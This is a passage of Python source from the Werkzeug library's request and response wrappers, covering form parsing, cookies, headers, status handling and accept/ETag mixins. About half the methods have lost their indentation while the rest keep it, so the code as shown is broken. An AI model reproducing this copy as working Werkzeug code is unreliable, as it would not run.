read-only mode was enforced by using immutables classes for all
data.
"""
#: the charset for the request, defaults to utf-8
charset = 'utf-8'
#: the error handling procedure for errors, defaults to 'replace'
encoding_errors = 'replace'
#: the maximum content length. This is forwarded to the form data
#: parsing function (:func:`parse_form_data`). When set and the
#: :attr:`form` or :attr:`files` attribute is accessed and the
#: parsing fails because more than the specified value is transmitted
#: a :exc:`~werkzeug.exceptions.RequestEntityTooLarge` exception is raised.
#:
#: Have a look at :ref:`dealing-with-request-data` for more details.
#:
#: .. versionadded:: 0.5
max_content_length = None
#: the maximum form field size. This is forwarded to the form data
#: parsing function (:func:`parse_form_data`). When set and the
#: :attr:`form` or :attr:`files` attribute is accessed and the
#: data in memory for post data is longer than the specified value a
#: :exc:`~werkzeug.exceptions.RequestEntityTooLarge` exception is raised.
#:
#: Have a look at :ref:`dealing-with-request-data` for more details.
#:
#: .. versionadded:: 0.5
max_form_memory_size = None
#: the class to use for `args` and `form`. The default is an
#: :class:`~werkzeug.datastructures.ImmutableMultiDict` which supports
#: multiple values per key. alternatively it makes sense to use an
#: :class:`~werkzeug.datastructures.ImmutableOrderedMultiDict` which
#: preserves order or a :class:`~werkzeug.datastructures.ImmutableDict`
#: which is the fastest but only remembers the last key. It is also
#: possible to use mutable structures, but this is not recommended.
#:
#: .. versionadded:: 0.6
parameter_storage_class = ImmutableMultiDict
#: the type to be used for list values from the incoming WSGI environment.
#: By default an :class:`~werkzeug.datastructures.ImmutableList` is used
#: (for example for :attr:`access_list`).
#:
#: .. versionadded:: 0.6
list_storage_class = ImmutableList
#: the type to be used for dict values from the incoming WSGI environment.
#: By default an
#: :class:`~werkzeug.datastructures.ImmutableTypeConversionDict` is used
#: (for example for :attr:`cookies`).
#:
#: .. versionadded:: 0.6
dict_storage_class = ImmutableTypeConversionDict
#: The form data parser that shoud be used. Can be replaced to customize
#: the form date parsing.
form_data_parser_class = FormDataParser
    def __init__(self, environ, populate_request=True, shallow=False):
        # Keep a reference to the raw WSGI environ; all properties read it.
        self.environ = environ
        if populate_request and not shallow:
            # Expose the request to middlewares/debuggers via the environ.
            self.environ['werkzeug.request'] = self
        self.shallow = shallow
def __repr__(self):
# make sure the __repr__ even works if the request was created
# from an invalid WSGI environment. If we display the request
# in a debug session we don't want the repr to blow up.
args = []
try:
args.append("'%s'" % self.url)
args.append('[%s]' % self.method)
except Exception:
args.append('(invalid WSGI environ)')
return '<%s %s>' % (
self.__class__.__name__,
' '.join(args)
)
    @property
    def url_charset(self):
        """The charset that is assumed for URLs.  Defaults to the value
        of :attr:`charset`.

        .. versionadded:: 0.6
        """
        # Override in a subclass to decode query strings with a different
        # charset than the request body.
        return self.charset
    @classmethod
    def from_values(cls, *args, **kwargs):
        """Create a new request object based on the values provided.  If
        environ is given missing values are filled from there.  This method is
        useful for small scripts when you need to simulate a request from an URL.
        Do not use this method for unittesting, there is a full featured client
        object (:class:`Client`) that allows to create multipart requests,
        support for cookies etc.

        This accepts the same options as the
        :class:`~werkzeug.test.EnvironBuilder`.

        .. versionchanged:: 0.5
           This method now accepts the same arguments as
           :class:`~werkzeug.test.EnvironBuilder`.  Because of this the
           `environ` parameter is now called `environ_overrides`.

        :return: request object
        """
        # Imported lazily so werkzeug.test is only loaded when needed.
        from werkzeug.test import EnvironBuilder
        # NOTE(review): `charset` is popped so EnvironBuilder never sees it,
        # but the popped value is otherwise unused -- confirm intended.
        charset = kwargs.pop('charset', cls.charset)
        builder = EnvironBuilder(*args, **kwargs)
        try:
            return builder.get_request(cls)
        finally:
            # Always release resources held by the builder.
            builder.close()
    @classmethod
    def application(cls, f):
        """Decorate a function as responder that accepts the request as first
        argument.  This works like the :func:`responder` decorator but the
        function is passed the request object as first argument::

            @Request.application
            def my_wsgi_app(request):
                return Response('Hello World!')

        :param f: the WSGI callable to decorate
        :return: a new WSGI callable
        """
        #: return a callable that wraps the -2nd argument with the request
        #: and calls the function with all the arguments up to that one and
        #: the request.  The return value is then called with the latest
        #: two arguments.  This makes it possible to use this decorator for
        #: both methods and standalone WSGI functions.
        # In WSGI terms: a[-2:] is (environ, start_response); the request is
        # built from environ (a[-2]), and f(...) returns a response object
        # that is then invoked as a WSGI application.
        return _patch_wrapper(f, lambda *a: f(*a[:-2]+(cls(a[-2]),))(*a[-2:]))
    def _get_file_stream(self, total_content_length, content_type, filename=None,
                         content_length=None):
        """Called to get a stream for the file upload.

        This must provide a file-like class with `read()`, `readline()`
        and `seek()` methods that is both writeable and readable.

        The default implementation returns a temporary file if the total
        content length is higher than 500KB.  Because many browsers do not
        provide a content length for the files only the total content
        length matters.

        :param total_content_length: the total content length of all the
                                     data in the request combined.  This value
                                     is guaranteed to be there.
        :param content_type: the mimetype of the uploaded file.
        :param filename: the filename of the uploaded file.  May be `None`.
        :param content_length: the length of this file.  This value is usually
                               not provided because webbrowsers do not provide
                               this value.
        """
        # Delegate to the form parser's default factory; subclasses override
        # this method to customize upload buffering.
        return default_stream_factory(total_content_length, content_type,
                                      filename, content_length)
@property
def want_form_data_parsed(self):
"""Returns True if the request method is ``POST``, ``PUT`` or
``PATCH``. Can be overriden to support other HTTP methods that
should carry form data.
.. versionadded:: 0.8
"""
return self.environ['REQUEST_METHOD'] in ('POST', 'PUT', 'PATCH')
    def make_form_data_parser(self):
        """Creates the form data parser.  Instanciates the
        :attr:`form_data_parser_class` with some parameters.

        .. versionadded:: 0.8
        """
        # All parsing knobs come from class-level attributes, so subclasses
        # can tune limits and charset without overriding this method.
        return self.form_data_parser_class(self._get_file_stream,
                                           self.charset,
                                           self.encoding_errors,
                                           self.max_form_memory_size,
                                           self.max_content_length,
                                           self.parameter_storage_class)
    def _load_form_data(self):
        """Method used internally to retrieve submitted data.  After calling
        this sets `form` and `files` on the request object to multi dicts
        filled with the incoming form data.  As a matter of fact the input
        stream will be empty afterwards.

        .. versionadded:: 0.8
        """
        # abort early if we have already consumed the stream
        if 'stream' in self.__dict__:
            return
        if self.shallow:
            raise RuntimeError('A shallow request tried to consume '
                               'form data. If you really want to do '
                               'that, set `shallow` to False.')
        data = None
        stream = _empty_stream
        if self.want_form_data_parsed:
            parser = self.make_form_data_parser()
            data = parser.parse_from_environ(self.environ)
        else:
            # if we have a content length header we are able to properly
            # guard the incoming stream, no matter what request method is
            # used.
            content_length = self.headers.get('content-length', type=int)
            if content_length is not None:
                stream = LimitedStream(self.environ['wsgi.input'],
                                       content_length)
        if data is None:
            # No parser ran: empty form/files and the (possibly guarded)
            # raw stream.
            data = (stream, self.parameter_storage_class(),
                    self.parameter_storage_class())
        # inject the values into the instance dict so that we bypass
        # our cached_property non-data descriptor.
        d = self.__dict__
        d['stream'], d['form'], d['files'] = data
@cached_property
def stream(self):
"""The parsed stream if the submitted data was not multipart or
urlencoded form data. This stream is the stream left by the form data
parser module after parsing. This is *not* the WSGI input stream but
a wrapper around it that ensures the caller does not accidentally
read past `Content-Length`.
"""
self._load_form_data()
return self.stream
input_stream = environ_property('wsgi.input', 'The WSGI input stream.\n'
'In general it\'s a bad idea to use this one because you can easily '
'read past the boundary. Use the :attr:`stream` instead.')
@cached_property
def args(self):
"""The parsed URL parameters. By default an
:class:`~werkzeug.datastructures.ImmutableMultiDict`
is returned from this function. This can be changed by setting
:attr:`parameter_storage_class` to a different type. This might
be necessary if the order of the form data is important.
"""
return url_decode(self.environ.get('QUERY_STRING', ''),
self.url_charset, errors=self.encoding_errors,
cls=self.parameter_storage_class)
@cached_property
def data(self):
"""This reads the buffered incoming data from the client into the
string. Usually it's a bad idea to access :attr:`data` because a client
could send dozens of megabytes or more to cause memory problems on the
server.
To circumvent that make sure to check the content length first.
"""
return self.stream.read()
@cached_property
def form(self):
"""The form parameters. By default an
:class:`~werkzeug.datastructures.ImmutableMultiDict`
is returned from this function. This can be changed by setting
:attr:`parameter_storage_class` to a different type. This might
be necessary if the order of the form data is important.
"""
self._load_form_data()
return self.form
@cached_property
def values(self):
"""Combined multi dict for :attr:`args` and :attr:`form`."""
args = []
for d in self.args, self.form:
if not isinstance(d, MultiDict):
d = MultiDict(d)
args.append(d)
return CombinedMultiDict(args)
@cached_property
def files(self):
""":class:`~werkzeug.datastructures.MultiDict` object containing
all uploaded files. Each key in :attr:`files` is the name from the
``<input type="file" name="">``. Each value in :attr:`files` is a
Werkzeug :class:`~werkzeug.datastructures.FileStorage` object.
Note that :attr:`files` will only contain data if the request method was
POST, PUT or PATCH and the ``<form>`` that posted to the request had
``enctype="multipart/form-data"``. It will be empty otherwise.
See the :class:`~werkzeug.datastructures.MultiDict` /
:class:`~werkzeug.datastructures.FileStorage` documentation for
more details about the used data structure.
"""
self._load_form_data()
return self.files
@cached_property
def cookies(self):
"""Read only access to the retrieved cookie values as dictionary."""
return parse_cookie(self.environ, self.charset,
cls=self.dict_storage_class)
@cached_property
def headers(self):
"""The headers from the WSGI environ as immutable
:class:`~werkzeug.datastructures.EnvironHeaders`.
"""
return EnvironHeaders(self.environ)
@cached_property
def path(self):
"""Requested path as unicode. This works a bit like the regular path
info in the WSGI environment but will always include a leading slash,
even if the URL root is accessed.
"""
path = '/' + (self.environ.get('PATH_INFO') or '').lstrip('/')
return _decode_unicode(path, self.url_charset, self.encoding_errors)
@cached_property
def script_root(self):
"""The root path of the script without the trailing slash."""
path = (self.environ.get('SCRIPT_NAME') or '').rstrip('/')
return _decode_unicode(path, self.url_charset, self.encoding_errors)
@cached_property
def url(self):
"""The reconstructed current URL"""
return get_current_url(self.environ)
@cached_property
def base_url(self):
"""Like :attr:`url` but without the querystring"""
return get_current_url(self.environ, strip_querystring=True)
@cached_property
def url_root(self):
"""The full URL root (with hostname), this is the application root."""
return get_current_url(self.environ, True)
@cached_property
def host_url(self):
"""Just the host with scheme."""
return get_current_url(self.environ, host_only=True)
@cached_property
def host(self):
"""Just the host including the port if available."""
return get_host(self.environ)
query_string = environ_property('QUERY_STRING', '', read_only=True, doc=
'''The URL parameters as raw bytestring.''')
method = environ_property('REQUEST_METHOD', 'GET', read_only=True, doc=
'''The transmission method. (For example ``'GET'`` or ``'POST'``).''')
@cached_property
def access_route(self):
"""If a forwarded header exists this is a list of all ip addresses
from the client ip to the last proxy server.
"""
if 'HTTP_X_FORWARDED_FOR' in self.environ:
addr = self.environ['HTTP_X_FORWARDED_FOR'].split(',')
return self.list_storage_class([x.strip() for x in addr])
elif 'REMOTE_ADDR' in self.environ:
return self.list_storage_class([self.environ['REMOTE_ADDR']])
return self.list_storage_class()
@property
def remote_addr(self):
"""The remote address of the client."""
return self.environ.get('REMOTE_ADDR')
remote_user = environ_property('REMOTE_USER', doc='''
If the server supports user authentication, and the script is
protected, this attribute contains the username the user has
authenticated as.''')
scheme = environ_property('wsgi.url_scheme', doc='''
URL scheme (http or https).
.. versionadded:: 0.7''')
is_xhr = property(lambda x: x.environ.get('HTTP_X_REQUESTED_WITH', '')
.lower() == 'xmlhttprequest', doc='''
True if the request was triggered via a JavaScript XMLHttpRequest.
This only works with libraries that support the `X-Requested-With`
header and set it to "XMLHttpRequest". Libraries that do that are
prototype, jQuery and Mochikit and probably some more.''')
is_secure = property(lambda x: x.environ['wsgi.url_scheme'] == 'https',
doc='`True` if the request is secure.')
is_multithread = environ_property('wsgi.multithread', doc='''
boolean that is `True` if the application is served by
a multithreaded WSGI server.''')
is_multiprocess = environ_property('wsgi.multiprocess', doc='''
boolean that is `True` if the application is served by
a WSGI server that spawns multiple processes.''')
is_run_once = environ_property('wsgi.run_once', doc='''
boolean that is `True` if the application will be executed only
once in a process lifetime. This is the case for CGI for example,
but it's not guaranteed that the exeuction only happens one time.''')
class BaseResponse(object):
    """Base response class. The most important fact about a response object
    is that it's a regular WSGI application. It's initialized with a couple
    of response parameters (headers, body, status code etc.) and will start a
    valid WSGI response when called with the environ and start response
    callable.
    Because it's a WSGI application itself processing usually ends before the
    actual response is sent to the server. This helps debugging systems
    because they can catch all the exceptions before responses are started.
    Here a small example WSGI application that takes advantage of the
    response objects::
        from werkzeug.wrappers import BaseResponse as Response
        def index():
            return Response('Index page')
        def application(environ, start_response):
            path = environ.get('PATH_INFO') or '/'
            if path == '/':
                response = index()
            else:
                response = Response('Not Found', status=404)
            return response(environ, start_response)
    Like :class:`BaseRequest`, this object is lacking a lot of functionality
    implemented in mixins. This gives you a better control about the actual
    API of your response objects, so you can create subclasses and add custom
    functionality. A full featured response object is available as
    :class:`Response` which implements a couple of useful mixins.
    To enforce a new type of already existing responses you can use the
    :meth:`force_type` method. This is useful if you're working with different
    subclasses of response objects and you want to post process them with a
    known interface.
    Per default the response object will assume all the text data is `utf-8`
    encoded. Please refer to `the unicode chapter <unicode.txt>`_ for more
    details about customizing the behavior.
    Response can be any kind of iterable or string. If it's a string it's
    considered being an iterable with one item which is the string passed.
    Headers can be a list of tuples or a
    :class:`~werkzeug.datastructures.Headers` object.
    Special note for `mimetype` and `content_type`: For most mime types
    `mimetype` and `content_type` work the same, the difference affects
    only 'text' mimetypes. If the mimetype passed with `mimetype` is a
    mimetype starting with `text/` it becomes a charset parameter defined
    with the charset of the response object. In contrast the
    `content_type` parameter is always added as header unmodified.
    .. versionchanged:: 0.5
        the `direct_passthrough` parameter was added.
    :param response: a string or response iterable.
    :param status: a string with a status or an integer with the status code.
    :param headers: a list of headers or a
                    :class:`~werkzeug.datastructures.Headers` object.
    :param mimetype: the mimetype for the response. See notice above.
    :param content_type: the content type for the response. See notice above.
    :param direct_passthrough: if set to `True` :meth:`iter_encoded` is not
                               called before iteration which makes it
                               possible to pass special iterators though
                               unchanged (see :func:`wrap_file` for more
                               details.)
    """
    #: the charset of the response.
    charset = 'utf-8'
    #: the default status if none is provided.
    default_status = 200
    #: the default mimetype if none is provided.
    default_mimetype = 'text/plain'
    #: if set to `False` accessing properties on the response object will
    #: not try to consume the response iterator and convert it into a list.
    #:
    #: .. versionadded:: 0.6.2
    #:
    #: That attribute was previously called `implicit_seqence_conversion`.
    #: (Notice the typo). If you did use this feature, you have to adapt
    #: your code to the name change.
    implicit_sequence_conversion = True
    #: Should this response object correct the location header to be RFC
    #: conformant? This is true by default.
    #:
    #: .. versionadded:: 0.8
    autocorrect_location_header = True
    #: Should this response object automatically set the content-length
    #: header if possible? This is true by default.
    #:
    #: .. versionadded:: 0.8
    automatically_set_content_length = True
    def __init__(self, response=None, status=None, headers=None,
                 mimetype=None, content_type=None, direct_passthrough=False):
        # Normalize `headers` into a Headers instance; an existing Headers
        # object is adopted without copying.
        if isinstance(headers, Headers):
            self.headers = headers
        elif not headers:
            self.headers = Headers()
        else:
            self.headers = Headers(headers)
        # Derive Content-Type from `mimetype` unless an explicit
        # `content_type` argument (or a pre-set header) takes precedence.
        if content_type is None:
            if mimetype is None and 'content-type' not in self.headers:
                mimetype = self.default_mimetype
            if mimetype is not None:
                mimetype = get_content_type(mimetype, self.charset)
            content_type = mimetype
        if content_type is not None:
            self.headers['Content-Type'] = content_type
        if status is None:
            status = self.default_status
        # Integers go through `status_code` (which derives the reason
        # phrase); strings go through `status` (which derives the code).
        if isinstance(status, (int, long)):
            self.status_code = status
        else:
            self.status = status
        self.direct_passthrough = direct_passthrough
        self._on_close = []
        # we set the response after the headers so that if a class changes
        # the charset attribute, the data is set in the correct charset.
        if response is None:
            self.response = []
        elif isinstance(response, basestring):
            self.data = response
        else:
            self.response = response
    def call_on_close(self, func):
        """Adds a function to the internal list of functions that should
        be called as part of closing down the response. Since 0.7 this
        function also returns the function that was passed so that this
        can be used as a decorator.
        .. versionadded:: 0.6
        """
        self._on_close.append(func)
        return func
    def __repr__(self):
        # Summarize the body: exact byte count for buffered responses,
        # otherwise just a streaming hint.
        if self.is_sequence:
            body_info = '%d bytes' % sum(map(len, self.iter_encoded()))
        else:
            body_info = self.is_streamed and 'streamed' or 'likely-streamed'
        return '<%s %s [%s]>' % (
            self.__class__.__name__,
            body_info,
            self.status
        )
    @classmethod
    def force_type(cls, response, environ=None):
        """Enforce that the WSGI response is a response object of the current
        type. Werkzeug will use the :class:`BaseResponse` internally in many
        situations like the exceptions. If you call :meth:`get_response` on an
        exception you will get back a regular :class:`BaseResponse` object, even
        if you are using a custom subclass.
        This method can enforce a given response type, and it will also
        convert arbitrary WSGI callables into response objects if an environ
        is provided::
            # convert a Werkzeug response object into an instance of the
            # MyResponseClass subclass.
            response = MyResponseClass.force_type(response)
            # convert any WSGI application into a response object
            response = MyResponseClass.force_type(response, environ)
        This is especially useful if you want to post-process responses in
        the main dispatcher and use functionality provided by your subclass.
        Keep in mind that this will modify response objects in place if
        possible!
        :param response: a response object or wsgi application.
        :param environ: a WSGI environment object.
        :return: a response object.
        """
        if not isinstance(response, BaseResponse):
            if environ is None:
                raise TypeError('cannot convert WSGI application into '
                                'response objects without an environ')
            response = BaseResponse(*_run_wsgi_app(response, environ))
        # rebind the class in place rather than copying the object
        response.__class__ = cls
        return response
    @classmethod
    def from_app(cls, app, environ, buffered=False):
        """Create a new response object from an application output. This
        works best if you pass it an application that returns a generator all
        the time. Sometimes applications may use the `write()` callable
        returned by the `start_response` function. This tries to resolve such
        edge cases automatically. But if you don't get the expected output
        you should set `buffered` to `True` which enforces buffering.
        :param app: the WSGI application to execute.
        :param environ: the WSGI environment to execute against.
        :param buffered: set to `True` to enforce buffering.
        :return: a response object.
        """
        return cls(*_run_wsgi_app(app, environ, buffered))
    def _get_status_code(self):
        return self._status_code
    def _set_status_code(self, code):
        # keep `status` (the full "code REASON" string) in sync
        self._status_code = code
        try:
            self._status = '%d %s' % (code, HTTP_STATUS_CODES[code].upper())
        except KeyError:
            self._status = '%d UNKNOWN' % code
    status_code = property(_get_status_code, _set_status_code,
                           doc='The HTTP Status code as number')
    del _get_status_code, _set_status_code
    def _get_status(self):
        return self._status
    def _set_status(self, value):
        # derive the numeric code from the leading token of the string;
        # fall back to 0 when it does not start with an integer
        self._status = value
        try:
            self._status_code = int(self._status.split(None, 1)[0])
        except ValueError:
            self._status_code = 0
    status = property(_get_status, _set_status, doc='The HTTP Status code')
    del _get_status, _set_status
    def _get_data(self):
        """The string representation of the response body. Whenever you access
        this property the response iterable is encoded and flattened. This
        can lead to unwanted behavior if you stream big data.
        This behavior can be disabled by setting
        :attr:`implicit_sequence_conversion` to `False`.
        """
        self._ensure_sequence()
        return ''.join(self.iter_encoded())
    def _set_data(self, value):
        # if an unicode string is set, it's encoded directly so that we
        # can set the content length
        if isinstance(value, unicode):
            value = value.encode(self.charset)
        self.response = [value]
        if self.automatically_set_content_length:
            self.headers['Content-Length'] = str(len(value))
    data = property(_get_data, _set_data, doc=_get_data.__doc__)
    del _get_data, _set_data
    def _ensure_sequence(self, mutable=False):
        """This method can be called by methods that need a sequence. If
        `mutable` is true, it will also ensure that the response sequence
        is a standard Python list.
        .. versionadded:: 0.6
        """
        if self.is_sequence:
            # if we need a mutable object, we ensure it's a list.
            if mutable and not isinstance(self.response, list):
                self.response = list(self.response)
            return
        if not self.implicit_sequence_conversion:
            raise RuntimeError('The response object required the iterable '
                               'to be a sequence, but the implicit '
                               'conversion was disabled. Call '
                               'make_sequence() yourself.')
        self.make_sequence()
    def make_sequence(self):
        """Converts the response iterator in a list. By default this happens
        automatically if required. If `implicit_sequence_conversion` is
        disabled, this method is not automatically called and some properties
        might raise exceptions. This also encodes all the items.
        .. versionadded:: 0.6
        """
        if not self.is_sequence:
            # if we consume an iterable we have to ensure that the close
            # method of the iterable is called if available when we tear
            # down the response
            close = getattr(self.response, 'close', None)
            self.response = list(self.iter_encoded())
            if close is not None:
                self.call_on_close(close)
    def iter_encoded(self, charset=None):
        """Iter the response encoded with the encoding of the response.
        If the response object is invoked as WSGI application the return
        value of this method is used as application iterator unless
        :attr:`direct_passthrough` was activated.
        .. versionchanged:: 0.6
           The `charset` parameter was deprecated and became a no-op.
        """
        # XXX: deprecated
        if __debug__ and charset is not None: # pragma: no cover
            from warnings import warn
            warn(DeprecationWarning('charset was deprecated and is ignored.'),
                 stacklevel=2)
        charset = self.charset
        if __debug__:
            _warn_if_string(self.response)
        # unicode items are encoded with the response charset; everything
        # else is coerced through str()
        for item in self.response:
            if isinstance(item, unicode):
                yield item.encode(charset)
            else:
                yield str(item)
    def set_cookie(self, key, value='', max_age=None, expires=None,
                   path='/', domain=None, secure=None, httponly=False):
        """Sets a cookie. The parameters are the same as in the cookie `Morsel`
        object in the Python standard library but it accepts unicode data, too.
        :param key: the key (name) of the cookie to be set.
        :param value: the value of the cookie.
        :param max_age: should be a number of seconds, or `None` (default) if
                        the cookie should last only as long as the client's
                        browser session.
        :param expires: should be a `datetime` object or UNIX timestamp.
        :param domain: if you want to set a cross-domain cookie. For example,
                       ``domain=".example.com"`` will set a cookie that is
                       readable by the domain ``www.example.com``,
                       ``foo.example.com`` etc. Otherwise, a cookie will only
                       be readable by the domain that set it.
        :param path: limits the cookie to a given path, per default it will
                     span the whole domain.
        :param secure: if `True` the cookie is marked as secure (sent over
                       HTTPS only), per the `Morsel` semantics.
        :param httponly: if `True` the cookie is marked http-only (hidden
                         from JavaScript), per the `Morsel` semantics.
        """
        self.headers.add('Set-Cookie', dump_cookie(key, value, max_age,
                         expires, path, domain, secure, httponly,
                         self.charset))
    def delete_cookie(self, key, path='/', domain=None):
        """Delete a cookie. Fails silently if key doesn't exist.
        :param key: the key (name) of the cookie to be deleted.
        :param path: if the cookie that should be deleted was limited to a
                     path, the path has to be defined here.
        :param domain: if the cookie that should be deleted was limited to a
                       domain, that domain has to be defined here.
        """
        # deletion works by expiring the cookie immediately
        self.set_cookie(key, expires=0, max_age=0, path=path, domain=domain)
    @property
    def header_list(self): # pragma: no cover
        # XXX: deprecated
        if __debug__:
            from warnings import warn
            warn(DeprecationWarning('header_list is deprecated'),
                 stacklevel=2)
        return self.headers.to_list(self.charset)
    @property
    def is_streamed(self):
        """If the response is streamed (the response is not an iterable with
        a length information) this property is `True`. In this case streamed
        means that there is no information about the number of iterations.
        This is usually `True` if a generator is passed to the response object.
        This is useful for checking before applying some sort of post
        filtering that should not take place for streamed responses.
        """
        try:
            len(self.response)
        except TypeError:
            return True
        return False
    @property
    def is_sequence(self):
        """If the iterator is buffered, this property will be `True`. A
        response object will consider an iterator to be buffered if the
        response attribute is a list or tuple.
        .. versionadded:: 0.6
        """
        return isinstance(self.response, (tuple, list))
    def close(self):
        """Close the wrapped response if possible."""
        if hasattr(self.response, 'close'):
            self.response.close()
        for func in self._on_close:
            func()
    def freeze(self):
        """Call this method if you want to make your response object ready for
        being pickled. This buffers the generator if there is one. It will
        also set the `Content-Length` header to the length of the body.
        .. versionchanged:: 0.6
           The `Content-Length` header is now set.
        """
        # we explicitly set the length to a list of the *encoded* response
        # iterator. Even if the implicit sequence conversion is disabled.
        self.response = list(self.iter_encoded())
        self.headers['Content-Length'] = str(sum(map(len, self.response)))
    def fix_headers(self, environ):
        # XXX: deprecated
        if __debug__:
            from warnings import warn
            warn(DeprecationWarning('called into deprecated fix_headers baseclass '
                                    'method. Use get_wsgi_headers instead.'),
                 stacklevel=2)
        self.headers[:] = self.get_wsgi_headers(environ)
    def get_wsgi_headers(self, environ):
        """This is automatically called right before the response is started
        and returns headers modified for the given environment. It returns a
        copy of the headers from the response with some modifications applied
        if necessary.
        For example the location header (if present) is joined with the root
        URL of the environment. Also the content length is automatically set
        to zero here for certain status codes.
        .. versionchanged:: 0.6
           Previously that function was called `fix_headers` and modified
           the response object in place. Also since 0.6, IRIs in location
           and content-location headers are handled properly.
           Also starting with 0.6, Werkzeug will attempt to set the content
           length if it is able to figure it out on its own. This is the
           case if all the strings in the response iterable are already
           encoded and the iterable is buffered.
        :param environ: the WSGI environment of the request.
        :return: returns a new :class:`~werkzeug.datastructures.Headers`
                 object.
        """
        headers = Headers(self.headers)
        location = None
        content_location = None
        content_length = None
        status = self.status_code
        # iterate over the headers to find all values in one go. Because
        # get_wsgi_headers is used for each response that gives us a tiny
        # speedup.
        for key, value in headers:
            ikey = key.lower()
            if ikey == 'location':
                location = value
            elif ikey == 'content-location':
                content_location = value
            elif ikey == 'content-length':
                content_length = value
        # make sure the location header is an absolute URL
        if location is not None:
            old_location = location
            if isinstance(location, unicode):
                location = iri_to_uri(location)
            if self.autocorrect_location_header:
                location = urlparse.urljoin(
                    get_current_url(environ, root_only=True),
                    location
                )
            if location != old_location:
                headers['Location'] = location
        # make sure the content location is a URL
        if content_location is not None and \
           isinstance(content_location, unicode):
            headers['Content-Location'] = iri_to_uri(content_location)
        # remove entity headers and set content length to zero if needed.
        # Also update content_length accordingly so that the automatic
        # content length detection does not trigger in the following
        # code.
        if 100 <= status < 200 or status == 204:
            headers['Content-Length'] = content_length = '0'
        elif status == 304:
            remove_entity_headers(headers)
        # if we can determine the content length automatically, we
        # should try to do that. But only if this does not involve
        # flattening the iterator or encoding of unicode strings in
        # the response. We however should not do that if we have a 304
        # response.
        if self.automatically_set_content_length and \
           self.is_sequence and content_length is None and status != 304:
            try:
                content_length = sum(len(str(x)) for x in self.response)
            except UnicodeError:
                # aha, something non-bytestringy in there, too bad, we
                # can't safely figure out the length of the response.
                pass
            else:
                headers['Content-Length'] = str(content_length)
        return headers
    def get_app_iter(self, environ):
        """Returns the application iterator for the given environ. Depending
        on the request method and the current status code the return value
        might be an empty response rather than the one from the response.
        If the request method is `HEAD` or the status code is in a range
        where the HTTP specification requires an empty response, an empty
        iterable is returned.
        .. versionadded:: 0.6
        :param environ: the WSGI environment of the request.
        :return: a response iterable.
        """
        status = self.status_code
        # HEAD requests and bodyless status codes get an empty iterable
        if environ['REQUEST_METHOD'] == 'HEAD' or \
           100 <= status < 200 or status in (204, 304):
            return ()
        if self.direct_passthrough:
            if __debug__:
                _warn_if_string(self.response)
            return self.response
        return ClosingIterator(self.iter_encoded(), self.close)
    def get_wsgi_response(self, environ):
        """Returns the final WSGI response as tuple. The first item in
        the tuple is the application iterator, the second the status and
        the third the list of headers. The response returned is created
        specially for the given environment. For example if the request
        method in the WSGI environment is ``'HEAD'`` the response will
        be empty and only the headers and status code will be present.
        .. versionadded:: 0.6
        :param environ: the WSGI environment of the request.
        :return: an ``(app_iter, status, headers)`` tuple.
        """
        # XXX: code for backwards compatibility with custom fix_headers
        # methods.
        if self.fix_headers.func_code is not \
           BaseResponse.fix_headers.func_code:
            if __debug__:
                from warnings import warn
                warn(DeprecationWarning('fix_headers changed behavior in 0.6 '
                                        'and is now called get_wsgi_headers. '
                                        'See documentation for more details.'),
                     stacklevel=2)
            self.fix_headers(environ)
            headers = self.headers
        else:
            headers = self.get_wsgi_headers(environ)
        app_iter = self.get_app_iter(environ)
        return app_iter, self.status, headers.to_list()
    def __call__(self, environ, start_response):
        """Process this response as WSGI application.
        :param environ: the WSGI environment.
        :param start_response: the response callable provided by the WSGI
                               server.
        :return: an application iterator
        """
        app_iter, status, headers = self.get_wsgi_response(environ)
        start_response(status, headers)
        return app_iter
class AcceptMixin(object):
    """A mixin for classes with an :attr:`~BaseResponse.environ` attribute
    to get all the HTTP accept headers as
    :class:`~werkzeug.datastructures.Accept` objects (or subclasses
    thereof).
    """
    @cached_property
    def accept_mimetypes(self):
        """The mimetypes this client accepts, as a
        :class:`~werkzeug.datastructures.MIMEAccept` object.
        """
        raw = self.environ.get('HTTP_ACCEPT')
        return parse_accept_header(raw, MIMEAccept)
    @cached_property
    def accept_charsets(self):
        """The charsets this client accepts, as a
        :class:`~werkzeug.datastructures.CharsetAccept` object.
        """
        raw = self.environ.get('HTTP_ACCEPT_CHARSET')
        return parse_accept_header(raw, CharsetAccept)
    @cached_property
    def accept_encodings(self):
        """The content encodings this client accepts. Encodings in a HTTP
        term are compression encodings such as gzip. For charsets have a
        look at :attr:`accept_charsets`.
        """
        raw = self.environ.get('HTTP_ACCEPT_ENCODING')
        return parse_accept_header(raw)
    @cached_property
    def accept_languages(self):
        """The languages this client accepts, as a
        :class:`~werkzeug.datastructures.LanguageAccept` object.
        .. versionchanged 0.5
           In previous versions this was a regular
           :class:`~werkzeug.datastructures.Accept` object.
        """
        raw = self.environ.get('HTTP_ACCEPT_LANGUAGE')
        return parse_accept_header(raw, LanguageAccept)
class ETagRequestMixin(object):
    """Add entity tag and cache descriptors to a request object or object with
    a WSGI environment available as :attr:`~BaseRequest.environ`. This not
    only provides access to etags but also to the cache control header.
    """
    @cached_property
    def cache_control(self):
        """The incoming cache control headers as a
        :class:`~werkzeug.datastructures.RequestCacheControl` object.
        """
        raw = self.environ.get('HTTP_CACHE_CONTROL')
        return parse_cache_control_header(raw, None, RequestCacheControl)
    @cached_property
    def if_match(self):
        """All the etags in the `If-Match` header.
        :rtype: :class:`~werkzeug.datastructures.ETags`
        """
        raw = self.environ.get('HTTP_IF_MATCH')
        return parse_etags(raw)
    @cached_property
    def if_none_match(self):
        """All the etags in the `If-None-Match` header.
        :rtype: :class:`~werkzeug.datastructures.ETags`
        """
        raw = self.environ.get('HTTP_IF_NONE_MATCH')
        return parse_etags(raw)
    @cached_property
    def if_modified_since(self):
        """The parsed `If-Modified-Since` header as datetime object."""
        raw = self.environ.get('HTTP_IF_MODIFIED_SINCE')
        return parse_date(raw)
    @cached_property
    def if_unmodified_since(self):
        """The parsed `If-Unmodified-Since` header as datetime object."""
        raw = self.environ.get('HTTP_IF_UNMODIFIED_SINCE')
        return parse_date(raw)
    @cached_property
    def if_range(self):
        """The parsed `If-Range` header.
        .. versionadded:: 0.7
        :rtype: :class:`~werkzeug.datastructures.IfRange`
        """
        raw = self.environ.get('HTTP_IF_RANGE')
        return parse_if_range_header(raw)
    @cached_property
    def range(self):
        """The parsed `Range` header.
        .. versionadded:: 0.7
        :rtype: :class:`~werkzeug.datastructures.Range`
        """
        raw = self.environ.get('HTTP_RANGE')
        return parse_range_header(raw)
class UserAgentMixin(object):
    """Adds a `user_agent` attribute to the request object which contains the
